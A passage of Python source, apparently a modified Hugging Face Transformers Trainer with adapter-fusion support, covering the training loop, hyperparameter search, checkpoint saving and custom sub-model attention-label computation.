return DataLoader( test_dataset, sampler=test_sampler, batch_size=self.args.eval_batch_size, collate_fn=self.data_collator, drop_last=self.args.dataloader_drop_last, ) def create_optimizer_and_scheduler(self, num_training_steps: int): """ Setup the optimizer and the learning rate scheduler. We provide a reasonable default that works well. If you want to use something else, you can pass a tuple in the Trainer's init through :obj:`optimizers`, or subclass and override this method in a subclass. """ if self.optimizer is None: no_decay = ["bias", "LayerNorm.weight"] if hasattr(self.model.config, "adapter_fusion_models"): no_decay += [f"adapter_fusion_layer.{n}.value" for n in self.model.config.adapter_fusion_models] optimizer_grouped_parameters = [ { "params": [p for n, p in self.model.named_parameters() if not any(nd in n for nd in no_decay)], "weight_decay": self.args.weight_decay, }, { "params": [p for n, p in self.model.named_parameters() if any(nd in n for nd in no_decay)], "weight_decay": 0.0, }, ] self.optimizer = AdamW( optimizer_grouped_parameters, lr=self.args.learning_rate, betas=(self.args.adam_beta1, self.args.adam_beta2), eps=self.args.adam_epsilon, ) if self.lr_scheduler is None: self.lr_scheduler = get_linear_schedule_with_warmup( self.optimizer, num_warmup_steps=self.args.warmup_steps, num_training_steps=num_training_steps ) def num_examples(self, dataloader: DataLoader) -> int: """ Helper to get number of samples in a :class:`~torch.utils.data.DataLoader` by accessing its dataset. 
Will raise an exception if the underlying dataset dese not implement method :obj:`__len__` """ return len(dataloader.dataset) def _hp_search_setup(self, trial: Union["optuna.Trial", Dict[str, Any]]): """ HP search setup code """ self._trial = trial if self.hp_search_backend is None or trial is None: return params = self.hp_space(trial) if self.hp_search_backend == HPSearchBackend.OPTUNA else trial for key, value in params.items(): if not hasattr(self.args, key): raise AttributeError( f"Trying to set {key} in the hyperparameter search but there is no corresponding field in `TrainingArguments`." ) old_attr = getattr(self.args, key, None) # Casting value to the proper type if old_attr is not None: value = type(old_attr)(value) setattr(self.args, key, value) if self.hp_search_backend == HPSearchBackend.OPTUNA: logger.info("Trial:", trial.params) def _report_to_hp_search( self, trial: Union["optuna.Trial", Dict[str, Any]], epoch: int, metrics: Dict[str, float] ): if self.hp_search_backend is None or trial is None: return self.objective = self.compute_objective(metrics.copy()) if self.hp_search_backend == HPSearchBackend.OPTUNA: trial.report(self.objective, epoch) if trial.should_prune(): raise optuna.TrialPruned() elif self.hp_search_backend == HPSearchBackend.RAY: if self.state.global_step % self.args.save_steps == 0: self._tune_save_checkpoint() tune.report(objective=self.objective, **metrics) def _tune_save_checkpoint(self): if not self.use_tune_checkpoints: return with tune.checkpoint_dir(step=self.state.global_step) as checkpoint_dir: self.args.output_dir = checkpoint_dir output_dir = os.path.join(self.args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{self.state.global_step}") self.save_model(output_dir) if self.is_world_master(): self.state.save_to_json(os.path.join(output_dir, "trainer_state.json")) torch.save(self.optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt")) torch.save(self.lr_scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt")) def 
call_model_init(self, trial=None): model_init_argcount = len(inspect.signature(self.model_init).parameters) if model_init_argcount == 0: model = self.model_init() elif model_init_argcount == 1: model = self.model_init(trial) else: raise RuntimeError("model_init should have 0 or 1 argument.") if model is None: raise RuntimeError("model_init should not return None.") return model def train(self, model_path: Optional[str] = None, trial: Union["optuna.Trial", Dict[str, Any]] = None): """ Main training entry point. Args: model_path (:obj:`str`, `optional`): Local path to the model if the model to train has been instantiated from a local path. If present, training will resume from the optimizer/scheduler states loaded here. trial (:obj:`optuna.Trial` or :obj:`Dict[str, Any]`, `optional`): The trial run or the hyperparameter dictionary for hyperparameter search. """ # This might change the seed so needs to run first. self._hp_search_setup(trial) # Model re-init if self.model_init is not None: # Seed must be set before instantiating the model when using model_init. 
set_seed(self.args.seed) model = self.call_model_init(trial) self.model = model.to(self.args.device) # Reinitializes optimizer and scheduler self.optimizer, self.lr_scheduler = None, None # Keeping track whether we can can len() on the dataset or not train_dataset_is_sized = isinstance(self.train_dataset, collections.abc.Sized) # Data loader and number of training steps train_dataloader = self.get_train_dataloader() # Setting up training control variables: # number of training epochs: num_train_epochs # number of training steps per epoch: num_update_steps_per_epoch # total number of training steps to execute: max_steps if train_dataset_is_sized: num_update_steps_per_epoch = len(train_dataloader) // self.args.gradient_accumulation_steps num_update_steps_per_epoch = max(num_update_steps_per_epoch, 1) if self.args.max_steps > 0: max_steps = self.args.max_steps num_train_epochs = self.args.max_steps // num_update_steps_per_epoch + int( self.args.max_steps % num_update_steps_per_epoch > 0 ) else: max_steps = math.ceil(self.args.num_train_epochs * num_update_steps_per_epoch) num_train_epochs = math.ceil(self.args.num_train_epochs) else: # see __init__. 
max_steps is set when the dataset has no __len__ max_steps = self.args.max_steps num_train_epochs = 1 num_update_steps_per_epoch = max_steps self.create_optimizer_and_scheduler(num_training_steps=max_steps) self.state = TrainerState() self.state.is_hyper_param_search = trial is not None # Check if saved optimizer or scheduler states exist self._load_optimizer_and_scheduler(model_path) # Mixed precision training with apex (torch < 1.6) model = self.model sub_model_list = self.sub_model_list if self.sub_model_list is not None else None if self.args.fp16 and _use_apex: if not is_apex_available(): raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.") model, self.optimizer = amp.initialize(model, self.optimizer, opt_level=self.args.fp16_opt_level) # Multi-gpu training (should be after apex fp16 initialization) if self.args.n_gpu > 1: model = torch.nn.DataParallel(model) if sub_model_list is not None: for s_index, sub_model in enumerate(sub_model_list): sub_model_list[s_index] = torch.nn.DataParallel(sub_model) print("pooh pararell worked") # Distributed training (should be after apex fp16 initialization) if self.args.local_rank != -1: model = torch.nn.parallel.DistributedDataParallel( model, device_ids=[self.args.local_rank], output_device=self.args.local_rank, find_unused_parameters=( not getattr(model.config, "gradient_checkpointing", False) if isinstance(model, PreTrainedModel) else True ), ) # find_unused_parameters breaks checkpointing as per # https://github.com/huggingface/transformers/pull/4659#issuecomment-643356021 # Train! 
if is_torch_tpu_available(): total_train_batch_size = self.args.train_batch_size * xm.xrt_world_size() else: total_train_batch_size = ( self.args.train_batch_size * self.args.gradient_accumulation_steps * (torch.distributed.get_world_size() if self.args.local_rank != -1 else 1) ) num_examples = ( self.num_examples(train_dataloader) if train_dataset_is_sized else total_train_batch_size * self.args.max_steps ) logger.info("***** Running training *****") logger.info(" Num examples = %d", num_examples) logger.info(" Num Epochs = %d", num_train_epochs) logger.info(" Instantaneous batch size per device = %d", self.args.per_device_train_batch_size) logger.info(" Total train batch size (w. parallel, distributed & accumulation) = %d", total_train_batch_size) logger.info(" Gradient Accumulation steps = %d", self.args.gradient_accumulation_steps) logger.info(" Total optimization steps = %d", max_steps) self.state.epoch = 0 epochs_trained = 0 steps_trained_in_current_epoch = 0 # Check if continuing training from a checkpoint if model_path and os.path.isfile(os.path.join(model_path, "trainer_state.json")): self.state = TrainerState.load_from_json(os.path.join(model_path, "trainer_state.json")) epochs_trained = self.state.global_step // num_update_steps_per_epoch steps_trained_in_current_epoch = self.state.global_step % (num_update_steps_per_epoch) logger.info(" Continuing training from checkpoint, will skip to saved global_step") logger.info(" Continuing training from epoch %d", epochs_trained) logger.info(" Continuing training from global step %d", self.state.global_step) logger.info(" Will skip the first %d steps in the first epoch", steps_trained_in_current_epoch) # Update the references self.callback_handler.model = self.model self.callback_handler.optimizer = self.optimizer self.callback_handler.lr_scheduler = self.lr_scheduler self.callback_handler.train_dataloader = train_dataloader self.state.trial_name = self.hp_name(trial) if self.hp_name is not None else None 
self.state.trial_params = hp_params(trial) if trial is not None else None # This should be the same if the state has been saved but in case the training arguments changed, it's safer # to set this after the load. self.state.max_steps = max_steps self.state.num_train_epochs = num_train_epochs self.state.is_local_process_zero = self.is_local_process_zero() self.state.is_world_process_zero = self.is_world_process_zero() tr_loss = torch.tensor(0.0).to(self.args.device) self._logging_loss_scalar = 0 self._globalstep_last_logged = 0 self._total_flos = self.state.total_flos model.zero_grad() self.control = self.callback_handler.on_train_begin(self.args, self.state, self.control) for epoch in range(epochs_trained, num_train_epochs): if isinstance(train_dataloader, DataLoader) and isinstance(train_dataloader.sampler, DistributedSampler): train_dataloader.sampler.set_epoch(epoch) if is_torch_tpu_available(): parallel_loader = pl.ParallelLoader(train_dataloader, [self.args.device]).per_device_loader( self.args.device ) epoch_iterator = parallel_loader else: epoch_iterator = train_dataloader # Reset the past mems state at the beginning of each epoch if necessary. 
if self.args.past_index >= 0: self._past = None steps_in_epoch = len(epoch_iterator) if train_dataset_is_sized else self.args.max_steps self.control = self.callback_handler.on_epoch_begin(self.args, self.state, self.control) for step, inputs in enumerate(epoch_iterator): # Skip past any already trained steps if resuming training if steps_trained_in_current_epoch > 0: steps_trained_in_current_epoch -= 1 continue if (step + 1) % self.args.gradient_accumulation_steps == 0: self.control = self.callback_handler.on_step_begin(self.args, self.state, self.control) if ( ((step + 1) % self.args.gradient_accumulation_steps != 0) and self.args.local_rank != -1 and _use_ddp_no_sync ): with model.no_sync(): tr_loss += self.training_step(model, inputs) else: if sub_model_list is not None : tr_loss += self.training_step(model, inputs, sub_model_list, step, epoch) else: tr_loss += self.training_step(model, inputs) self._total_flos += self.floating_point_ops(inputs) if (step + 1) % self.args.gradient_accumulation_steps == 0 or ( # last step in epoch but step is always smaller than gradient_accumulation_steps steps_in_epoch <= self.args.gradient_accumulation_steps and (step + 1) == steps_in_epoch ): # apply adapter fusion weight regularization on the value matrix if ( hasattr(self.model.config, "adapter_fusion") and self.model.config.adapter_fusion["regularization"] ): fusion_reg_loss = self.model.base_model.get_fusion_regularization_loss() fusion_reg_loss.backward() if self.args.fp16 and _use_native_amp: self.scaler.unscale_(self.optimizer) torch.nn.utils.clip_grad_norm_(model.parameters(), self.args.max_grad_norm) elif self.args.fp16 and _use_apex: torch.nn.utils.clip_grad_norm_(amp.master_params(self.optimizer), self.args.max_grad_norm) else: torch.nn.utils.clip_grad_norm_(model.parameters(), self.args.max_grad_norm) if is_torch_tpu_available(): xm.optimizer_step(self.optimizer) elif self.args.fp16 and _use_native_amp: self.scaler.step(self.optimizer) self.scaler.update() else: 
self.optimizer.step() self.lr_scheduler.step() model.zero_grad() self.state.global_step += 1 self.state.epoch = epoch + (step + 1) / steps_in_epoch self.control = self.callback_handler.on_step_end(self.args, self.state, self.control) self._maybe_log_save_evaluate(tr_loss, model, trial, epoch) if self.control.should_epoch_stop or self.control.should_training_stop: break self.control = self.callback_handler.on_epoch_end(self.args, self.state, self.control) self._maybe_log_save_evaluate(tr_loss, model, trial, epoch) if self.args.tpu_metrics_debug or self.args.debug: if is_torch_tpu_available(): # tpu-comment: Logging debug metrics for PyTorch/XLA (compile, execute times, ops, etc.) xm.master_print(met.metrics_report()) else: logger.warning( "You enabled PyTorch/XLA debug metrics but you don't have a TPU " "configured. Check your training configuration if this is unexpected." ) if self.control.should_training_stop: break if self.args.past_index and hasattr(self, "_past"): # Clean the state at the end of training delattr(self, "_past") if self.do_save_adapters: logger.info("\n\nTraining completed. Do not forget to share your adapters on https://adapterhub.ml =)\n\n") else: logger.info("\n\nTraining completed. Do not forget to share your model on huggingface.co/models =)\n\n") if self.args.load_best_model_at_end and self.state.best_model_checkpoint is not None: if self.do_save_full_model: logger.info( f"Loading best model from {self.state.best_model_checkpoint} (score: {self.state.best_metric})." ) if isinstance(model, PreTrainedModel): self.model = model.from_pretrained(self.state.best_model_checkpoint) else: state_dict = torch.load(os.path.join(self.state.best_model_checkpoint, WEIGHTS_NAME)) self.model.load_state_dict(state_dict) if self.do_save_adapters: logger.info( f"Loading best adapter(s) from {self.state.best_model_checkpoint} (score: {self.state.best_metric})." 
) # attempt to re-load all adapters from checkpoint for adapter in self.model.config.adapters.adapters: adapter_dir = os.path.join(self.state.best_model_checkpoint, adapter) if os.path.exists(adapter_dir): self.model.load_adapter(adapter_dir) if self.do_save_adapter_fusion: logger.info( f"Loading best adapter fusion(s) from {self.state.best_model_checkpoint} (score: {self.state.best_metric})." ) # attempt to re-load all adapter fusions from checkpoint for fusion in self.model.config.adapter_fusion_models: fusion_dir = os.path.join(self.state.best_model_checkpoint, fusion) if os.path.exists(fusion_dir): self.model.load_adapter_fusion(fusion_dir) self.model = self.model.to(self.args.device) if self._total_flos is not None: self.store_flos() self.log({"total_flos": self.state.total_flos}) self.control = self.callback_handler.on_train_end(self.args, self.state, self.control) return TrainOutput(self.state.global_step, tr_loss.item() / self.state.global_step) def _maybe_log_save_evaluate(self, tr_loss, model, trial, epoch): if self.control.should_log: logs: Dict[str, float] = {} tr_loss_scalar = tr_loss.item() logs["loss"] = (tr_loss_scalar - self._logging_loss_scalar) / ( self.state.global_step - self._globalstep_last_logged ) # backward compatibility for pytorch schedulers logs["learning_rate"] = ( self.lr_scheduler.get_last_lr()[0] if version.parse(torch.__version__) >= version.parse("1.4") else self.lr_scheduler.get_lr()[0] ) self._logging_loss_scalar = tr_loss_scalar self._globalstep_last_logged = self.state.global_step self.log(logs) metrics = None if self.control.should_evaluate: metrics = self.evaluate() self._report_to_hp_search(trial, epoch, metrics) if self.control.should_save: self._save_checkpoint(model, trial, metrics=metrics) self.control = self.callback_handler.on_save(self.args, self.state, self.control) def _save_checkpoint(self, model, trial, metrics=None): # In all cases (even distributed/parallel), self.model is always a reference # to the model we 
want to save. if hasattr(model, "module"): assert model.module is self.model, f"Module {model.module} should be a reference to self.model" else: assert model is self.model, f"Model {model} should be a reference to self.model" # Save model checkpoint checkpoint_folder = f"{PREFIX_CHECKPOINT_DIR}-{self.state.global_step}" if self.hp_search_backend is not None and trial is not None: run_id = trial.number if self.hp_search_backend == HPSearchBackend.OPTUNA else tune.get_trial_id() run_name = self.hp_name(trial) if self.hp_name is not None else f"run-{run_id}" output_dir = os.path.join(self.args.output_dir, run_name, checkpoint_folder) else: output_dir = os.path.join(self.args.output_dir, checkpoint_folder) self.store_flos() self.save_model(output_dir) # Save optimizer and scheduler if is_torch_tpu_available(): xm.rendezvous("saving_optimizer_states") xm.save(self.optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt")) with warnings.catch_warnings(record=True) as caught_warnings: xm.save(self.lr_scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt")) reissue_pt_warnings(caught_warnings) elif self.is_world_process_zero(): torch.save(self.optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt")) with warnings.catch_warnings(record=True) as caught_warnings: torch.save(self.lr_scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt")) reissue_pt_warnings(caught_warnings) # Determine the new best metric / best model checkpoint if metrics is not None and self.args.metric_for_best_model is not None: metric_to_check = self.args.metric_for_best_model if not metric_to_check.startswith("eval_"): metric_to_check = f"eval_{metric_to_check}" metric_value = metrics[metric_to_check] operator = np.greater if self.args.greater_is_better else np.less if ( self.state.best_metric is None or self.state.best_model_checkpoint is None or operator(metric_value, self.state.best_metric) ): self.state.best_metric = metric_value self.state.best_model_checkpoint = 
output_dir # Save the Trainer state if self.is_world_process_zero(): self.state.save_to_json(os.path.join(output_dir, "trainer_state.json")) # Maybe delete some older checkpoints. if self.is_world_process_zero(): self._rotate_checkpoints(use_mtime=True) def _load_optimizer_and_scheduler(self, model_path): """If optimizer and scheduler states exist, load them.""" if ( model_path is not None and os.path.isfile(os.path.join(model_path, "optimizer.pt")) and os.path.isfile(os.path.join(model_path, "scheduler.pt")) ): # Load in optimizer and scheduler states if is_torch_tpu_available(): # On TPU we have to take some extra precautions to properly load the states on the right device. optimizer_state = torch.load(os.path.join(model_path, "optimizer.pt"), map_location="cpu") with warnings.catch_warnings(record=True) as caught_warnings: lr_scheduler_state = torch.load(os.path.join(model_path, "scheduler.pt"), map_location="cpu") reissue_pt_warnings(caught_warnings) xm.send_cpu_data_to_device(optimizer_state, self.args.device) xm.send_cpu_data_to_device(lr_scheduler_state, self.args.device) self.optimizer.load_state_dict(optimizer_state) self.lr_scheduler.load_state_dict(lr_scheduler_state) else: self.optimizer.load_state_dict( torch.load(os.path.join(model_path, "optimizer.pt"), map_location=self.args.device) ) with warnings.catch_warnings(record=True) as caught_warnings: self.lr_scheduler.load_state_dict(torch.load(os.path.join(model_path, "scheduler.pt"))) reissue_pt_warnings(caught_warnings) def hyperparameter_search( self, hp_space: Optional[Callable[["optuna.Trial"], Dict[str, float]]] = None, compute_objective: Optional[Callable[[Dict[str, float]], float]] = None, n_trials: int = 20, direction: str = "minimize", backend: Optional[Union["str", HPSearchBackend]] = None, hp_name: Optional[Callable[["optuna.Trial"], str]] = None, **kwargs ) -> BestRun: """ Launch an hyperparameter search using ``optuna`` or ``Ray Tune``. 
The optimized quantity is determined by :obj:`compute_objectie`, which defaults to a function returning the evaluation loss when no metric is provided, the sum of all metrics otherwise. .. warning:: To use this method, you need to have provided a ``model_init`` when initializing your :class:`~transformers.Trainer`: we need to reinitialize the model at each new run. This is incompatible with the ``optimizers`` argument, so you need to subclass :class:`~transformers.Trainer` and override the method :meth:`~transformers.Trainer.create_optimizer_and_scheduler` for custom optimizer/scheduler. Args: hp_space (:obj:`Callable[["optuna.Trial"], Dict[str, float]]`, `optional`): A function that defines the hyperparameter search space. Will default to :func:`~transformers.trainer_utils.default_hp_space_optuna` or :func:`~transformers.trainer_utils.default_hp_space_ray` depending on your backend. compute_objective (:obj:`Callable[[Dict[str, float]], float]`, `optional`): A function computing the objective to minimize or maximize from the metrics returned by the :obj:`evaluate` method. Will default to :func:`~transformers.trainer_utils.default_compute_objective`. n_trials (:obj:`int`, `optional`, defaults to 100): The number of trial runs to test. direction(:obj:`str`, `optional`, defaults to :obj:`"minimize"`): Whether to optimize greater or lower objects. Can be :obj:`"minimize"` or :obj:`"maximize"`, you should pick :obj:`"minimize"` when optimizing the validation loss, :obj:`"maximize"` when optimizing one or several metrics. backend(:obj:`str` or :class:`~transformers.training_utils.HPSearchBackend`, `optional`): The backend to use for hyperparameter search. Will default to optuna or Ray Tune, depending on which one is installed. If both are installed, will default to optuna. kwargs: Additional keyword arguments passed along to :obj:`optuna.create_study` or :obj:`ray.tune.run`. 
For more information see: - the documentation of `optuna.create_study <https://optuna.readthedocs.io/en/stable/reference/alias_generated/optuna.create_study.html#optuna.create_study>`__ - the documentation of `tune.run <https://docs.ray.io/en/latest/tune/api_docs/execution.html#tune-run>`__ Returns: :class:`transformers.trainer_utils.BestRun`: All the information about the best run. """ if backend is None: backend = default_hp_search_backend() if backend is None: raise RuntimeError( "At least one of optuna or ray should be installed. " "To install optuna run `pip install optuna`." "To install ray run `pip install ray[tune]`." ) backend = HPSearchBackend(backend) if backend == HPSearchBackend.OPTUNA and not is_optuna_available(): raise RuntimeError("You picked the optuna backend, but it is not installed. Use `pip install optuna`.") if backend == HPSearchBackend.RAY and not is_ray_available(): raise RuntimeError( "You picked the Ray Tune backend, but it is not installed. Use `pip install 'ray[tune]'`." ) self.hp_search_backend = backend if self.model_init is None: raise RuntimeError( "To use hyperparameter search, you need to pass your model through a model_init function." ) self.hp_space = default_hp_space[backend] if hp_space is None else hp_space self.hp_name = hp_name self.compute_objective = default_compute_objective if compute_objective is None else compute_objective run_hp_search = run_hp_search_optuna if backend == HPSearchBackend.OPTUNA else run_hp_search_ray best_run = run_hp_search(self, n_trials, direction, **kwargs) self.hp_search_backend = None return best_run def log(self, logs: Dict[str, float]) -> None: """ Log :obj:`logs` on the various objects watching training. Subclass and override this method to inject custom behavior. Args: logs (:obj:`Dict[str, float]`): The values to log. 
""" if hasattr(self, "_log"): warnings.warn( "The `_log` method is deprecated and won't be called in a future version, define `log` in your subclass.", FutureWarning, ) return self._log(logs) if self.state.epoch is not None: logs["epoch"] = self.state.epoch self.control = self.callback_handler.on_log(self.args, self.state, self.control, logs) output = {**logs, **{"step": self.state.global_step}} self.state.log_history.append(output) def _prepare_inputs(self, inputs: Dict[str, Union[torch.Tensor, Any]]) -> Dict[str, Union[torch.Tensor, Any]]: """ Prepare :obj:`inputs` before feeding them to the model, converting them to tensors if they are not already and handling potential state. """ for k, v in inputs.items(): if isinstance(v, torch.Tensor): inputs[k] = v.to(self.args.device) if self.args.past_index >= 0 and self._past is not None: inputs["mems"] = self._past if self.adapter_names: inputs["adapter_names"] = self.adapter_names return inputs def training_step(self, model: nn.Module, inputs: Dict[str, Union[torch.Tensor, Any]], sub_model_list: List[nn.Module] = None, step=None, epoch=None) -> torch.Tensor: """ Perform a training step on a batch of inputs. Subclass and override to inject custom behavior. Args: model (:obj:`nn.Module`): The model to train. inputs (:obj:`Dict[str, Union[torch.Tensor, Any]]`): The inputs and targets of the model. The dictionary will be unpacked before being fed to the model. Most models expect the targets under the argument :obj:`labels`. Check your model's documentation for all accepted arguments. Return: :obj:`torch.Tensor`: The tensor with training loss on this batch. 
""" if hasattr(self, "_training_step"): warnings.warn( "The `_training_step` method is deprecated and won't be called in a future version, define `training_step` in your subclass.", FutureWarning, ) return self._training_step(model, inputs, self.optimizer, step) model.train() if sub_model_list is not None: for sub_model in sub_model_list: sub_model.eval() inputs = self._prepare_inputs(inputs) if self.args.fp16 and _use_native_amp: with autocast(): loss = self.compute_loss(model, inputs) else: if sub_model_list is not None: loss = self.compute_loss(model, inputs, sub_model_list, step, epoch) else: loss = self.compute_loss(model, inputs) if self.args.n_gpu > 1: loss = loss.mean() # mean() to average on multi-gpu parallel training if self.args.gradient_accumulation_steps > 1: loss = loss / self.args.gradient_accumulation_steps if self.args.fp16 and _use_native_amp: self.scaler.scale(loss).backward() elif self.args.fp16 and _use_apex: with amp.scale_loss(loss, self.optimizer) as scaled_loss: scaled_loss.backward() else: loss.backward() return loss.detach() def compute_loss(self, model, inputs, sub_model_list=None, step=None, epoch=None): """ How the loss is computed by Trainer. By default, all models return the loss in the first element. Subclass and override for customs behavior. """ if sub_model_list is not None: #multi label # attention_label = self._multi_label(sub_model_list, inputs) #single label attention_label = self._single_label(sub_model_list, inputs) # attention_label = self._negative_single_label(sub_model_list, inputs) else: attention_label = None outputs = model(**inputs,attention_label=attention_label, step=step, epoch=epoch) # Save past state if it exists if self.args.past_index >= 0: self._past = outputs[self.args.past_index] # We don't use .loss here since the model may return tuples instead of ModelOutput. 
return outputs[0] def _multi_label(self, sub_model_list, inputs): attention_label_list = [] for sub_model in sub_model_list: loss, logits, labels = self.prediction_step(model=sub_model,inputs=inputs, prediction_loss_only=False) preds = torch.argmax(logits, axis=-1) b_preds = [int(torch.eq(preds[i],labels[i]).item()) for i in range(labels.shape[-1])] attention_label_list.append(b_preds) attention_label = torch.tensor(attention_label_list).transpose(-1,0) # attention_label =[batch_num,answer_choice_num] return attention_label def _single_label(self, sub_model_list, inputs): logit_list = [] c_labels = None for sub_model in sub_model_list: loss, logits, labels = self.prediction_step(model=sub_model,inputs=inputs, prediction_loss_only=False) s_logits = nn.Softmax(dim=-1)(logits) logit_list.append(s_logits) if c_labels is not None: assert (torch.equal(c_labels, labels)), "labels between sub models are different." c_labels = labels stack_all = torch.stack(logit_list) attention_label_list = [] for i in range(stack_all.shape[1]): answer_index = None best_var = 0 for j in range(stack_all.shape[0]): if torch.argmax(stack_all[j][i], dim=-1) == c_labels[i].item(): if torch.std(stack_all[j][i]).item() > best_var: best_var = torch.std(stack_all[j][i]).item() answer_index = j attention_label_list.append(answer_index) attention_label = [] for answer_label in attention_label_list: exp_label = [] for choice in range(stack_all.shape[0]): if answer_label == choice: exp_label.append(1) else: exp_label.append(0) attention_label.append(exp_label) attention_label = torch.tensor(attention_label) # attention_label =[8,3] return attention_label def _negative_single_label(self, sub_model_list, inputs): logit_list = [] c_labels = None for sub_model in sub_model_list: loss, logits, labels = self.prediction_step(model=sub_model,inputs=inputs, prediction_loss_only=False) s_logits = nn.Softmax(dim=-1)(logits) logit_list.append(s_logits) if c_labels is not None: assert (torch.equal(c_labels, 
labels)), "labels between sub models are different." c_labels = labels stack_all = torch.stack(logit_list) attention_label_list = [] for i in range(stack_all.shape[1]): answer_index = None wrong_index = None best_var = 0 worst_var = 0 for j in range(stack_all.shape[0]): if torch.argmax(stack_all[j][i], dim=-1) == c_labels[i].item(): if torch.std(stack_all[j][i]).item() > best_var: best_var = torch.std(stack_all[j][i]).item() answer_index = j else: if torch.std(stack_all[j][i]).item() > worst_var: worst_var = torch.std(stack_all[j][i]).item() wrong_index = j attention_label_list.append((answer_index, wrong_index)) attention_label = [] for (answer_label, wrong_label) in attention_label_list: exp_label = [] for choice in range(stack_all.shape[0]): if answer_label == choice: exp_label.append(1) elif wrong_label == choice: exp_label.append(-1) else: exp_label.append(0) attention_label.append(exp_label) attention_label = torch.tensor(attention_label) # attention_label =[8,3] return attention_label def is_local_master(self) -> bool: """ Whether or not this process is the local (e.g., on one machine if training in a distributed fashion on several machines) main process. .. warning:: This method is deprecated, use :meth:`~transformers.Trainer.is_local_process_zero` instead. """ warnings.warn("This method is deprecated, use `Trainer.is_local_process_zero()` instead.", FutureWarning) return self.is_local_process_zero() def is_local_process_zero(self) -> bool: """ Whether or not this process is the local (e.g., on one machine if training in a distributed fashion on several machines) main process. """ if is_torch_tpu_available(): return xm.is_master_ordinal(local=True) else: return self.args.local_rank in [-1, 0] def is_world_master(self) -> bool: """ Whether or not this process is the global main process (when training in a distributed fashion on several machines, this is only going to be :obj:`True` for one process). .. 
warning:: This method is deprecated, use :meth:`~transformers.Trainer.is_world_process_zero` instead. """ warnings.warn("This method is deprecated, use `Trainer.is_world_process_zero()` instead.", FutureWarning) return self.is_world_process_zero() def is_world_process_zero(self) -> bool: """ Whether or not this process is the global main process (when training in a distributed fashion on several machines, this is only going to be :obj:`True` for one process). """ if is_torch_tpu_available(): return xm.is_master_ordinal(local=False) else: return self.args.local_rank == -1 or torch.distributed.get_rank() == 0 def save_model(self, output_dir: Optional[str] = None): """ Will save the model, so you can reload it using :obj:`from_pretrained()`. Will only save from the world_master process (unless in TPUs). """ if is_torch_tpu_available(): self._save_tpu(output_dir) elif self.is_world_process_zero(): self._save(output_dir) def _save_tpu(self, output_dir: Optional[str] = None): output_dir = output_dir if output_dir is not None else self.args.output_dir logger.info("Saving model checkpoint to %s", output_dir) if xm.is_master_ordinal(): os.makedirs(output_dir, exist_ok=True) torch.save(self.args, os.path.join(output_dir, "training_args.bin")) # Save a trained model and configuration using `save_pretrained()`. 
# They can then be reloaded using `from_pretrained()` xm.rendezvous("saving_checkpoint") if not isinstance(self.model, PreTrainedModel): logger.info("Trainer.model is not a `PreTrainedModel`, only saving its state dict.") state_dict = self.model.state_dict() xm.save(state_dict, os.path.join(output_dir, WEIGHTS_NAME)) else: if self.do_save_adapters: self.model.save_all_adapters(output_dir) if self.do_save_adapter_fusion: self.model.save_all_adapter_fusions(output_dir) if self.do_save_full_model: self.model.save_pretrained(output_dir) if self.tokenizer is not None and self.is_world_process_zero(): self.tokenizer.save_pretrained(output_dir) def _save(self, output_dir: Optional[str] = None): output_dir = output_dir if output_dir is not None else self.args.output_dir os.makedirs(output_dir, exist_ok=True) logger.info("Saving model checkpoint to %s", output_dir) # Save a trained model and configuration using `save_pretrained()`. # They can then be reloaded using `from_pretrained()` if not isinstance(self.model, PreTrainedModel): logger.info("Trainer.model is not a `PreTrainedModel`, only saving its state dict.") state_dict = self.model.state_dict() torch.save(state_dict, os.path.join(output_dir, WEIGHTS_NAME)) else: if self.do_save_adapters: self.model.save_all_adapters(output_dir) if self.do_save_adapter_fusion: self.model.save_all_adapter_fusions(output_dir) if self.do_save_full_model: self.model.save_pretrained(output_dir) if self.tokenizer is not None and self.is_world_process_zero(): self.tokenizer.save_pretrained(output_dir) # Good practice: save your training arguments together with the trained model torch.save(self.args, os.path.join(output_dir, "training_args.bin")) def store_flos(self): # Storing the number of floating-point operations that went into the model if self._total_flos is not None: if self.args.local_rank != -1: self.state.total_flos = distributed_broadcast_scalars([self._total_flos]).sum().item() else: self.state.total_flos = self._total_flos def 
_sorted_checkpoints(self, checkpoint_prefix=PREFIX_CHECKPOINT_DIR, use_mtime=False) -> List[str]: ordering_and_checkpoint_path = [] glob_checkpoints = [str(x) for x in Path(self.args.output_dir).glob(f"{checkpoint_prefix}-*")] for path in glob_checkpoints: if use_mtime: ordering_and_checkpoint_path.append((os.path.getmtime(path), path)) else: regex_match = re.match(f".*{checkpoint_prefix}-([0-9]+)", path) if regex_match and regex_match.groups(): ordering_and_checkpoint_path.append((int(regex_match.groups()[0]), path)) checkpoints_sorted = sorted(ordering_and_checkpoint_path) checkpoints_sorted = [checkpoint[1] for checkpoint in checkpoints_sorted] # Make sure we don't delete the best model. if self.state.best_model_checkpoint is not None: best_model_index = checkpoints_sorted.index(str(Path(self.state.best_model_checkpoint))) checkpoints_sorted[best_model_index], checkpoints_sorted[-1] = ( checkpoints_sorted[-1], checkpoints_sorted[best_model_index], ) return checkpoints_sorted def _rotate_checkpoints(self, use_mtime=False) -> None: if self.args.save_total_limit is None or self.args.save_total_limit <= 0: return # Check if we should delete older checkpoint(s) checkpoints_sorted = self._sorted_checkpoints(use_mtime=use_mtime) if len(checkpoints_sorted) <= self.args.save_total_limit: return number_of_checkpoints_to_delete = max(0, len(checkpoints_sorted) - self.args.save_total_limit) checkpoints_to_be_deleted = checkpoints_sorted[:number_of_checkpoints_to_delete] for checkpoint in checkpoints_to_be_deleted: logger.info("Deleting older checkpoint [{}] due to args.save_total_limit".format(checkpoint)) shutil.rmtree(checkpoint) def evaluate(self, eval_dataset: Optional[Dataset] = None) -> Dict[str, float]: """ Run evaluation and returns metrics. The calling script will be responsible for providing a method to compute metrics, as they are task-dependent (pass it to the init :obj:`compute_metrics` argument). 
